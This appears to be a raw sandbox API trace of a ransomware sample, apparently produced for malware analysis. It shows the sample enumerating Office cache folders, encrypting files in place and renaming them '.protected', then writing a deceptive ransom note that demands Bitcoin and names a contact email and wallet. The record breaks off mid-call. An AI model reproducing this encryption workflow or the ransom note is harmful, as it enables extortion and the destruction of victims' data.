[0052.707] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All 
Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0052.707] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 81 [0052.707] StrStrW (lpFirst="OutlookMUI.xml", lpSrch=".txt") returned 0x0 [0052.707] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 81 [0052.707] StrStrW (lpFirst="OutlookMUI.xml", lpSrch=".rar") returned 0x0 [0052.707] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 81 [0052.707] StrStrW (lpFirst="OutlookMUI.xml", lpSrch=".zip") returned 0x0 [0052.707] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0xc72, lpOverlapped=0x0) returned 1 [0052.784] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffff38e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0052.784] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0xc72, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0xc72, lpOverlapped=0x0) returned 1 [0052.784] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0052.784] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0052.784] WriteFile (in: hFile=0xb4, 
lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0052.785] CloseHandle (hObject=0xb4) returned 1 [0052.785] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.protected") returned 91 [0052.785] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml.protected")) returned 1 [0052.786] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0052.786] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0052.786] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files") returned 1 [0052.786] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files (x86)") returned 1 [0052.786] lstrcmpiW (lpString1="Setup.xml", lpString2="$Recycle.bin") returned 1 [0052.786] lstrcmpiW (lpString1="Setup.xml", lpString2="System Volume Information") returned -1 [0052.786] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0052.786] StrStrIW (lpFirst="Setup.xml", lpSrch=".protected") returned 0x0 [0052.786] lstrcmpW (lpString1="Setup.xml", lpString2="RESTORE_FILES.txt") returned 1 [0052.786] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0052.786] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, 
dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0052.786] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0052.787] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0052.787] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0052.787] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0052.787] StrStrW (lpFirst="Setup.xml", lpSrch=".rar") returned 0x0 [0052.787] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0052.787] StrStrW (lpFirst="Setup.xml", lpSrch=".zip") returned 0x0 [0052.787] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x106f, lpOverlapped=0x0) returned 1 [0052.794] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffef91, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0052.794] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x106f, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x106f, lpOverlapped=0x0) returned 1 [0052.794] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0052.794] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, 
lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0052.794] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0052.794] CloseHandle (hObject=0xb4) returned 1 [0052.795] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.protected") returned 86 [0052.795] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml.protected")) returned 1 [0052.796] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0052.796] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0052.796] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\RESTORE_FILES.txt") returned 84 [0052.796] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\RESTORE_FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0052.796] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0052.796] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0052.797] lstrlenA (lpString="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") returned 684 [0052.797] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0052.797] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0052.797] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0052.797] CloseHandle (hObject=0xa4) returned 1 [0052.797] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0052.797] lstrcmpiW (lpString1="{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0052.798] lstrcmpiW (lpString1="{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2="Program Files") returned -1 [0052.798] lstrcmpiW (lpString1="{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2="Program Files (x86)") returned -1 [0052.798] lstrcmpiW (lpString1="{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2="$Recycle.bin") returned 1 [0052.798] lstrcmpiW (lpString1="{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2="System Volume Information") returned -1 [0052.798] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C") returned 66 [0052.798] lstrcmpW (lpString1="{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0052.798] lstrcmpW (lpString1="{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0052.798] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*") returned 68 [0052.798] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x447cc0 [0052.799] lstrcmpiW 
(lpString1=".", lpString2="Windows") returned -1 [0052.799] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0052.799] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0052.799] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0052.799] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0052.799] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\.") returned 68 [0052.799] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0052.799] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0052.799] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0052.799] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0052.799] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0052.799] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\." 
(normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0052.799] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0052.799] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0052.799] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0052.799] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0052.799] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0052.799] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0052.799] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\..") returned 69 [0052.799] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0052.800] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0052.800] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0052.800] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0052.800] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0052.800] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0052.800] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\.." 
(normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0052.800] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0052.800] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0052.800] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files") returned 1 [0052.800] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files (x86)") returned 1 [0052.800] lstrcmpiW (lpString1="Setup.xml", lpString2="$Recycle.bin") returned 1 [0052.800] lstrcmpiW (lpString1="Setup.xml", lpString2="System Volume Information") returned -1 [0052.800] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0052.800] StrStrIW (lpFirst="Setup.xml", lpSrch=".protected") returned 0x0 [0052.800] lstrcmpW (lpString1="Setup.xml", lpString2="RESTORE_FILES.txt") returned 1 [0052.800] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0052.800] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0052.800] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0052.801] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0052.801] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 
[0052.801] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0052.801] StrStrW (lpFirst="Setup.xml", lpSrch=".rar") returned 0x0 [0052.801] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0052.801] StrStrW (lpFirst="Setup.xml", lpSrch=".zip") returned 0x0 [0052.801] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x978, lpOverlapped=0x0) returned 1 [0052.822] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffff688, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0052.822] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x978, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x978, lpOverlapped=0x0) returned 1 [0052.823] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0052.823] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0052.823] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0052.823] CloseHandle (hObject=0xb4) returned 1 [0052.824] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.protected") returned 86 [0052.824] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All 
Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml.protected")) returned 1 [0052.833] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0052.833] lstrcmpiW (lpString1="WordLR.cab", lpString2="Windows") returned 1 [0052.833] lstrcmpiW (lpString1="WordLR.cab", lpString2="Program Files") returned 1 [0052.833] lstrcmpiW (lpString1="WordLR.cab", lpString2="Program Files (x86)") returned 1 [0052.833] lstrcmpiW (lpString1="WordLR.cab", lpString2="$Recycle.bin") returned 1 [0052.833] lstrcmpiW (lpString1="WordLR.cab", lpString2="System Volume Information") returned 1 [0052.833] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 77 [0052.833] StrStrIW (lpFirst="WordLR.cab", lpSrch=".protected") returned 0x0 [0052.833] lstrcmpW (lpString1="WordLR.cab", lpString2="RESTORE_FILES.txt") returned 1 [0052.833] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0052.833] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0052.833] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0052.833] lstrlenW 
(lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 77 [0052.833] StrStrW (lpFirst="WordLR.cab", lpSrch=".txt") returned 0x0 [0052.833] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 77 [0052.833] StrStrW (lpFirst="WordLR.cab", lpSrch=".rar") returned 0x0 [0052.833] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 77 [0052.833] StrStrW (lpFirst="WordLR.cab", lpSrch=".zip") returned 0x0 [0052.833] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0052.850] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0052.850] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0052.850] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0052.850] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0052.852] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0052.852] CloseHandle (hObject=0xb4) returned 1 [0053.282] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All 
Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab.protected") returned 87 [0053.282] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab.protected" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab.protected")) returned 1 [0053.283] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0053.283] lstrcmpiW (lpString1="WordMUI.msi", lpString2="Windows") returned 1 [0053.283] lstrcmpiW (lpString1="WordMUI.msi", lpString2="Program Files") returned 1 [0053.283] lstrcmpiW (lpString1="WordMUI.msi", lpString2="Program Files (x86)") returned 1 [0053.283] lstrcmpiW (lpString1="WordMUI.msi", lpString2="$Recycle.bin") returned 1 [0053.283] lstrcmpiW (lpString1="WordMUI.msi", lpString2="System Volume Information") returned 1 [0053.283] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 78 [0053.283] StrStrIW (lpFirst="WordMUI.msi", lpSrch=".protected") returned 0x0 [0053.283] lstrcmpW (lpString1="WordMUI.msi", lpString2="RESTORE_FILES.txt") returned 1 [0053.283] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0053.283] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0053.283] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0053.283] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 78 [0053.283] StrStrW (lpFirst="WordMUI.msi", lpSrch=".txt") returned 0x0 [0053.283] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 78 [0053.283] StrStrW (lpFirst="WordMUI.msi", lpSrch=".rar") returned 0x0 [0053.283] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 78 [0053.284] StrStrW (lpFirst="WordMUI.msi", lpSrch=".zip") returned 0x0 [0053.284] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, 